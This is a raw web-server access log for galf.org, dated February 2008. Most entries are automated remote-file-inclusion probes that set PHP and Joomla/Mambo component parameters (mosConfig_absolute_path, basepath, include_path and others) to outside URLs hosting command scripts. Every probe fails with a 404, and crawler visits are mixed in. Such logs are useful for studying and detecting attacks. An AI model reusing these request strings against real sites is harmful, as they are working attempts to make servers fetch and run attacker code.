138.102.82.2 - - [03/Feb/2008:17:39:20 -0800] "GET /logs/access_070709.log/index.php?U=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
138.102.82.2 - - [03/Feb/2008:17:39:21 -0800] "GET /index.php?U=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
138.102.82.2 - - [03/Feb/2008:17:39:21 -0800] "GET /logs/index.php?U=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.79.168.42 - - [03/Feb/2008:17:46:34 -0800] "GET /logs/access.log/index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.79.168.42 - - [03/Feb/2008:17:46:35 -0800] "GET /index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.79.168.42 - - [03/Feb/2008:17:46:35 -0800] "GET /logs/index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
78.110.50.105 - - [03/Feb/2008:17:49:18 -0800] "GET /logs/template.php?pagina=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.110.50.105 - - [03/Feb/2008:17:49:19 -0800] "GET /template.php?pagina=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:17:49:42 -0800] "GET /logs/access_070709.log/modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:17:49:42 -0800] "GET /modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:17:49:42 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.169.187.243 - - [03/Feb/2008:17:50:37 -0800] "GET /modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
194.186.47.24 - - [03/Feb/2008:17:51:15 -0800] "GET //modules/admin/vw_usr_roles.php?baseDir=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:17:51:24 -0800] "GET /logs/access_070709.log/index.php?u=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:17:51:24 -0800] "GET /index.php?u=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:17:51:25 -0800] "GET /logs/index.php?u=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:17:51:30 -0800] "GET /logs/access_070716.log/modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.149.115.250 - - [03/Feb/2008:17:52:39 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.149.115.250 - - [03/Feb/2008:17:52:40 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.218.149.119 - - [03/Feb/2008:17:55:34 -0800] "GET /index.php?U=http://xamuja.freehostia.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:17:58:13 -0800] "GET /logs/access_070709.log/modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:17:58:13 -0800] "GET /modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:17:58:13 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:17:58:18 -0800] "GET /logs/access_070716.log/modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.186.47.24 - - [03/Feb/2008:18:00:55 -0800] "GET /spamx/MTBlackList.Examine.class.php?_CONF[path]=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.215.212 - - [03/Feb/2008:18:10:11 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.212 - - [03/Feb/2008:18:10:12 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
76.118.156.214 - - [03/Feb/2008:18:15:32 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "CFNetwork/129.22" "www.galf.org"
72.30.216.90 - - [03/Feb/2008:18:16:00 -0800] "GET /logs/access_071224.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
82.94.221.121 - - [03/Feb/2008:18:20:43 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://ineal.biz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.94.221.121 - - [03/Feb/2008:18:20:43 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://ineal.biz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.24.226 - - [03/Feb/2008:18:26:59 -0800] "GET /logs/ HTTP/1.0" 200 5784 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.79.168.42 - - [03/Feb/2008:18:32:20 -0800] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.79.168.42 - - [03/Feb/2008:18:32:20 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.79.168.42 - - [03/Feb/2008:18:32:20 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.232.200.122 - - [03/Feb/2008:18:34:05 -0800] "GET /logs/access_070716.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.200.122 - - [03/Feb/2008:18:34:05 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.200.122 - - [03/Feb/2008:18:34:05 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.200.122 - - [03/Feb/2008:18:34:29 -0800] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.233.178.136 - - [03/Feb/2008:18:41:23 -0800] "GET / HTTP/1.0" 200 1032 "http://translate.google.com/translate?hl=pt-BR&sl=en&u=http://www.galf.org/&sa=X&oi=translate&resnum=2&ct=result&prev=/search%3Fq%3Dlesbianas%26hl%3Dpt-BR" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; HbTools 4.7.1),gzip(gfe) (via translate.google.com)" "www.galf.org"
210.1.31.63 - - [03/Feb/2008:18:43:55 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.1.31.63 - - [03/Feb/2008:18:43:56 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.187.243 - - [03/Feb/2008:18:45:17 -0800] "GET /logs/access_070709.log/index.php?u=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.187.243 - - [03/Feb/2008:18:45:18 -0800] "GET /logs/index.php?u=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
210.142.144.70 - - [03/Feb/2008:18:47:50 -0800] "GET /logs/announcements.php?phpraid_dir=http://www.bakhshian.ir/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.142.144.70 - - [03/Feb/2008:18:47:50 -0800] "GET /announcements.php?phpraid_dir=http://www.bakhshian.ir/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.169.174.238 - - [03/Feb/2008:18:48:47 -0800] "GET /logs//includes/settings.inc.php?include_path=http://www.greytauctions.org/panji_tengkorak/scrol.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "galf.org"
81.169.174.238 - - [03/Feb/2008:18:48:48 -0800] "GET //includes/settings.inc.php?include_path=http://www.greytauctions.org/panji_tengkorak/scrol.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "galf.org"
217.149.115.250 - - [03/Feb/2008:18:51:11 -0800] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.30.216.100 - - [03/Feb/2008:18:52:38 -0800] "GET /logs/access_071210.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
80.237.148.55 - - [03/Feb/2008:18:54:53 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
80.237.148.55 - - [03/Feb/2008:18:54:54 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
80.237.148.55 - - [03/Feb/2008:18:54:54 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
80.237.148.55 - - [03/Feb/2008:18:55:43 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
80.237.148.55 - - [03/Feb/2008:18:55:43 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
80.237.148.55 - - [03/Feb/2008:18:55:43 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
211.218.149.119 - - [03/Feb/2008:18:56:32 -0800] "GET /logs/access_070709.log/index.php?U=http://xamuja.freehostia.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
211.218.149.119 - - [03/Feb/2008:18:56:32 -0800] "GET /logs/index.php?U=http://xamuja.freehostia.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
67.195.44.108 - - [03/Feb/2008:18:56:34 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.44.95 - - [03/Feb/2008:18:56:35 -0800] "GET /logs/access_071224.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
210.142.144.70 - - [03/Feb/2008:18:56:37 -0800] "GET /logs/announcements.php?phpraid_dir=http://www.bakhshian.ir/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.142.144.70 - - [03/Feb/2008:18:56:38 -0800] "GET /announcements.php?phpraid_dir=http://www.bakhshian.ir/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
88.109.7.133 - - [03/Feb/2008:19:00:35 -0800] "GET /logs/access_070716.log//logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.109.7.133 - - [03/Feb/2008:19:00:36 -0800] "GET //logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.109.7.133 - - [03/Feb/2008:19:00:36 -0800] "GET /logs//logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.109.7.133 - - [03/Feb/2008:19:00:40 -0800] "GET /logs/access_070709.log//logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.35.191.126 - - [03/Feb/2008:19:01:10 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.strider.xpg.com.br/stdr/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.35.191.126 - - [03/Feb/2008:19:01:10 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.strider.xpg.com.br/stdr/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
88.109.7.133 - - [03/Feb/2008:19:04:09 -0800] "GET /logs/access_070716.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.109.7.133 - - [03/Feb/2008:19:04:10 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.109.7.133 - - [03/Feb/2008:19:04:10 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.195.44.94 - - [03/Feb/2008:19:09:16 -0800] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
210.1.31.63 - - [03/Feb/2008:19:16:13 -0800] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:19:19:03 -0800] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:19:19:03 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:19:19:03 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.200.122 - - [03/Feb/2008:19:23:09 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.7.109 - - [03/Feb/2008:19:23:30 -0800] "GET /logs/access_071022.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.232.200.122 - - [03/Feb/2008:19:23:46 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
216.40.234.90 - - [03/Feb/2008:19:28:24 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.216.104 - - [03/Feb/2008:19:28:53 -0800] "GET /logs/access_071217.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.75.35.118 - - [03/Feb/2008:19:30:58 -0800] "GET /logs/access_070709.log/log.details.html//components/com_cpg/cpg.php?mosConfig_absolute_path=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [03/Feb/2008:19:30:58 -0800] "GET /log.details.html//components/com_cpg/cpg.php?mosConfig_absolute_path=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [03/Feb/2008:19:30:58 -0800] "GET /logs/log.details.html//components/com_cpg/cpg.php?mosConfig_absolute_path=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.149.115.250 - - [03/Feb/2008:19:32:03 -0800] "GET /logs/access_070709.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.1.31.63 - - [03/Feb/2008:19:35:31 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.1.31.63 - - [03/Feb/2008:19:35:32 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.1.31.63 - - [03/Feb/2008:19:38:46 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.1.31.63 - - [03/Feb/2008:19:38:47 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [03/Feb/2008:19:39:00 -0800] "GET /logs/access_070716.log/log.details.html//components/com_cpg/cpg.php?mosConfig_absolute_path=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.109.7.133 - - [03/Feb/2008:19:40:28 -0800] "GET /logs/access_070709.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.1.31.63 - - [03/Feb/2008:19:42:46 -0800] "GET /logs/access_070709.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.20.70 - - [03/Feb/2008:19:43:39 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
217.31.58.88 - - [03/Feb/2008:19:44:22 -0800] "GET /convert/mvcw.php?vwar_root=http://h1.ripway.com/credo/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "galf.org"
217.31.58.88 - - [03/Feb/2008:19:44:23 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://h1.ripway.com/credo/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "galf.org"
216.40.234.90 - - [03/Feb/2008:19:47:10 -0800] "GET /logs/access_070716.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.40.234.90 - - [03/Feb/2008:19:47:11 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.35.191.126 - - [03/Feb/2008:19:48:07 -0800] "GET /logs/mcf.php?content=http://www.strider.xpg.com.br/stdr/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.35.191.126 - - [03/Feb/2008:19:48:07 -0800] "GET /mcf.php?content=http://www.strider.xpg.com.br/stdr/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
200.116.128.221 - - [03/Feb/2008:19:49:54 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "galf.org"
88.109.7.133 - - [03/Feb/2008:19:49:58 -0800] "GET /logs/access_070709.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.109.7.133 - - [03/Feb/2008:19:49:58 -0800] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.109.7.133 - - [03/Feb/2008:19:49:59 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.116.128.221 - - [03/Feb/2008:19:50:00 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "galf.org"
83.149.101.49 - - [03/Feb/2008:19:50:40 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.149.101.49 - - [03/Feb/2008:19:50:41 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.149.101.49 - - [03/Feb/2008:19:50:41 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.149.101.49 - - [03/Feb/2008:19:50:41 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.212.0.39 - - [03/Feb/2008:19:52:59 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "galf.org"
72.30.216.8 - - [03/Feb/2008:19:53:58 -0800] "GET /logs/access.log HTTP/1.0" 200 48966 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
88.109.7.133 - - [03/Feb/2008:19:58:10 -0800] "GET /logs/access_070716.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.109.7.133 - - [03/Feb/2008:19:58:11 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.109.7.133 - - [03/Feb/2008:19:58:11 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
